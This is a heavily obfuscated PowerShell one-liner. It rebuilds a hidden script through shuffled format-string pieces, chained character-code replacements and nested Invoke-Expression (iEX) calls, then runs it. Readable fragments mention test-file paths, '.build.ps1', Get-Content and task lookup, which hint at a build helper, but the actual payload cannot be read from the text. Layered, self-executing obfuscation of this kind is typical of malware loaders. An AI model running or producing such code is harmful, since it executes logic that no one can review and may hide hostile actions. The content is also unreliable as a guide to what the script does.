iEX(((("{46}{127}{116}{115}{61}{92}{126}{11}{0}{38}{52}{62}{87}{83}{51}{67}{120}{21}{60}{5}{35}{88}{36}{73}{86}{6}{68}{72}{33}{123}{98}{14}{44}{17}{63}{32}{24}{117}{22}{118}{43}{122}{113}{55}{54}{47}{10}{28}{27}{97}{64}{106}{45}{89}{71}{58}{41}{102}{104}{31}{129}{128}{16}{12}{124}{57}{25}{105}{75}{99}{79}{65}{59}{108}{50}{125}{96}{114}{9}{84}{111}{7}{3}{42}{81}{109}{30}{93}{74}{18}{130}{4}{56}{119}{34}{19}{29}{121}{100}{76}{20}{80}{103}{107}{37}{101}{2}{91}{90}{39}{78}{110}{13}{82}{8}{94}{77}{15}{26}{48}{112}{69}{1}{85}{53}{95}{23}{70}{66}{49}{40}" -f '69}{47}{79}{55}{20}{93','n yavyav +QR0,QR0unQDC2,DC2,QR0ne(yavTextQR','0iQR0,Q','QRDC2,DC20nd InvokeQR0,QR0 ','C2,DC2}{155}{39}{144}','{5}{117}{71}{178}{104}{125}{14DC2,DC24).REpLace(QR0yavQR0,QR0hX4Q','R0)
DC2,DC2R0dqEQR',')
	Write-Error cQR0,QR06R61{QRDC2,DC2,QR0  QR0,QR064:56G61}','C2,DC','}{108}{25}{169}{167}{44}{98}{87}{57}{15}{5DC2,DC20  yaQR0,QR0 by QR0,QR0	','C2QR0,QR0-obJQR0,QR0DC2','75}{27}{86}{57}{','C2,DC2R]','C2,DC248}{9','{141}{151}{1DC2,DC258}{24}{41}{22}{58}{111}{105}{129}{133}{124DC2,',',QR0 yQR0,QDC2,DC20DC2,','DC2,DC20D','2,DC2PQR0,QDC2,DC2E{QR','t =QR0,Q','0DC2,DC2hQR0,QR0COnQR0,QR0{QR0,QR0v =QR0,QR0 0QR0,','}{2}{168}{21}{1D','QR0,QR0qQR0,QR0adqE -SQR0,QDC2,DC227}{68}{46}{146}{115}{','SpLITdqEMQR0,QR0%dQR0,QR0
}

QR0,QR06QR0,','R0onQR0,QR0pLITdqE}dqDC2)) -rEpL','nQRDC2,DC2R0dqQR0,QR0G160{7QR0,QR0plQR0,QR0ISQR0,QR0ns(yavTeQR0,QR0( dqE47QR0,QR0 ','R]72),[STRIng][chaR]124).REpLace(QR0c5yDC2,DC2{160}{107}','DC2Q','55}{176}{181}{DC2,DC2R0,QR0nG]QRDC2,DC20,QR0
		QR0,QR0<QR0,QR0t; ++yaDC2,DC2{11}{121',',DC23DC2,DC2 ((h6P{86}{122}{96}{','QR0yavQR0,Q','QR0ildQRDC2,DC2,QR0TrIQR0,QR0 {
	foQR0','QR0,QR0S',' dqEOFSdQR0,QR0(DC2,DC2','DC2,DC2R0avyaQR0,QR01}64M','14}{102DC2,DC20,QR0iTdqQR0,QR0ps1
#>QR0,QR','R0)','-varIAbLe QR0','}{112}{91}{81}{147}{34}{10}{156}{152}{97}{106','}{84}{65}{40}{59}{56}{16','{186}{185}{130}{73}{166}{113}{143','PDC2,[chAr]34-rEpLaCe  DC2hX4DC2,[chAr]36)XYuIex
',' DC2,DC2R0)).REpLace(Q','Q','R0,QR0om.build.ps1','DC2R0kQR0,QR0CoQR0,QR0nvokQR0,QR0iDC','2,DC2vQR0',' (((IiK{26}{51}{42}{43}{4','0,QR0
QR0,QR0 InQR0,QR0E isQR0,QR0E.tDC2,D','R0,QR0dqQR0,QR0tQR0,QR05yyav(QR0,QR067QR0,QRDC2,DC2QR0qEGQR0,QR0 Find-LQR0,QR0DC2,DC20,QR0= (c5yyaQR0,QR0eQR0,','EPlaCeDC2h6','R0,QR06(( QRDC2,DC276}DC2,DC2}{17}{82}DC2,D','R0DC2,DC2{DC2,DC2,QR0)QR0,','}{15}{33}{9}{85}{50}{37}{80}{58}{54}{12}{38}{41}{68}{25}{6}IiK -fDC2QR0,QR0PlITdqEQdQR0,Q',' QR0,QR0ret','}{9}{38}h6P -fQR0EQR','R0dqE ) cQR0,QR0YQR0,QR0avQR0DC2,DC2,QR0v -lt yavQR0DC2,DC2),8 DC2,DC2}{164}{93}{3}{134','{13}{95}{138DC2,','a','QR0DC2,DC20,QR0dQR0,QR0vlYAp QR0,QR0 [ChaR](','uQRDC2,DC2  QR0,QR0athQR0,DC2,DC2)))QR0,QR0yDC2,DC2R0,QR01QR0,QR0

functi','149}{92}','3}{83}{23}{24}{46}{36}{10}{4}{78}{7','R0vQR0,QR0].CQR0,QR00HFoREAChQR0,QR0dqQR0,QR05y QR0,QR0{4DC2,DC212DC2,DC2ontent QR0,QR0 1QR0,QR0e-TQR0,QR0vyaQR0,QR0E -QR0,QR0mVSQR0,QR0et-QR0,QR','0,QR0','C2}{61}{0}{37}{135}{77}{89','QR0B','r]124  -cr','QR0 QR0,QR0}63Q62QR0,QR0','0,QR0tQR0,QR0[QR0,Q','0yav_DC2,DC27dQR0,QR0sQR0,QR0','aCe  ([chAr]81+[chAr]82+[chAr]48),[chAr]39  -rEpLaCe([chAr]66+[chAr]57+[chAr]109),[chA','}{26}{103}{116}{175}{74}DC2,DC20,QR0dc5yQR0,','R0CDC2,DC282}{23}{154}{180}{177}{54}{90}{80}{18}{12}{64}{16}{139}{88}{29}{7}{179}{47}{83}{35}{78}{31}{142}{184}{60}{49}{6DC2,DC2qE-SQR0,QR0} )+cQR0,QRDC2,DC2xt))QR0DC2,DC2{32}{101}{1','*mdr*QR0).Name[3,11','DC2,DC20,QR0qE-SpLQR0,QR0EDC2,DC2QR0
yavConten','}{50}{14}{132}{110}{28}{70}{165}{75}{','}{53}{84','0,QR0ydqQR0DC2,DC20extQR0,QR0esQR0,QR0PliQR0,QR0ontent.QR0,QR0vQR0,QR0CQR0,QR0SdQR0,QR0SpliQR0','}{63}{52}{36}{30}{109}','0)QR0,QDC2,DC2GQR0,QR0 c5QR0,','C2,DC','R0,QR0d','4}{59}{137}{153}{20D','t[yavyavQR0,QR0TQR0,QR0 QR0,QR0 QR0,QR01QR0,QR0ecQ','	}
	}QR0,QDC2,DC263U56Q62QDC2,DC2
			QR0,QR0n-DC2,DC2,QR0roQR0,QR0TestFQR0,QR0 not founQR0,QR0qQR0,QR0askFromQR0,QR05QRDC2,DC2R0y+','0,QR0 aQR0DC2,DC2opsis
	UQR0,QR0r(QR0,QR0ilePatDC2,DC2,QR0',',2]-joInQR0Q','0','B9m. ((geT',',QR0dqEdqEDC2,DC2f QR0,QR0DC2,DC2R0,DC2,DC25','0,QR0dqQR0,QR05}DC2,DC2QR0,QDC2,DC20,QR0itQDC2,DC2','R0EyavTQR0,QR0oQR0,DC2,DC2QR0qEQR0,QR02%61Q6QR','0}{21}{61}{45}{19}{87}{66}{89}{22}{48}{64}{',',QR0#
.SynDC2,DC2QR0,[STRIng][chaR]','2R','urQDC2,DC2R0,QR0E-SQR0,QR0R151QR0,QR0yQR0,QR0(QR0,Q','2','}DC2,D','qQR0,QR0qE -sPlitdQDC2,DC2{131}{56}{163}{48}{72}{170}{42}','62}{67}{4DC2,DC2oQR0,QR','2,DC23}{174}{157}{140}{172}{150}{8','}{1}{1DC2,DC2R0SVQR0,QR','R0dqEQR0,[STRIng][chaR]39).REpLace(([chaR]89+[chaDC2,D','21}{','C2de.tQR0,QR0t{(','{136}{33}{4}{40}{66}{DC2,DC299}DC2,DC2{119','}{162}DC2,DC2R0,QDC','126}{85}{161}{65}{159}{173','oDC2,DC2R0ntenQR0,QR0lePath = JoiQ','qEQR0,','{171}{D','[SQR0,QRDC2,DC2,QR0 {DC2,DC2}{100}{69}{19}{118}DC2,DC2,QR0tOiNQR0,QR0tdQR0,QR0CDC2,DC2yavQR0,QR0st.psQR0,QR0

yavTQDC2,DC2{120}DC2,DC2aQR0,QR0 GQR0,QR0','QR',',QR0CoQR0,QR0; yaDC2,DC2R0,QR0veRt]::QR0,QR0E-SPlItdqEUdqEQR0,QR0taiQR0,Q','8}{45','{30}{11}{73}{52}{82}{5}{35}{63}{1','}{14}{60}{29}{3}{1}{53}{77}{8}{72}','-','QR0eQ','DC2','-TaskFQR0,QR0v)','R0E:dqE QDC','QR0,QR0qE dQR0,QR0estFiQR0','5QR0,QR0','48+[ch','C23}{79}{183}{127}{1','74}{17}{62}{34}{88}{39}{94}{71}{28}{32}{0}{90}{49}{18}{81}{31}{7}{2}{91}{67}{92}{','4}{76','0[SQR0,QR0t.QR0,QR0IQ','V dqEOfQR0,QR0-sQR0,QR','R0
QR0,QR0eFrQR0DC2,DC2E-sPLITdqERdQR0,QR0RING]QR0,QR0RootQRD')) -RepLACE 'IiK',[cHAR]34  -RepLACE  'DC2',[cHAR]39 -RepLACE  ([cHAR]88+[cHAR]89+[cHAR]117),[cHAR]124) ) 
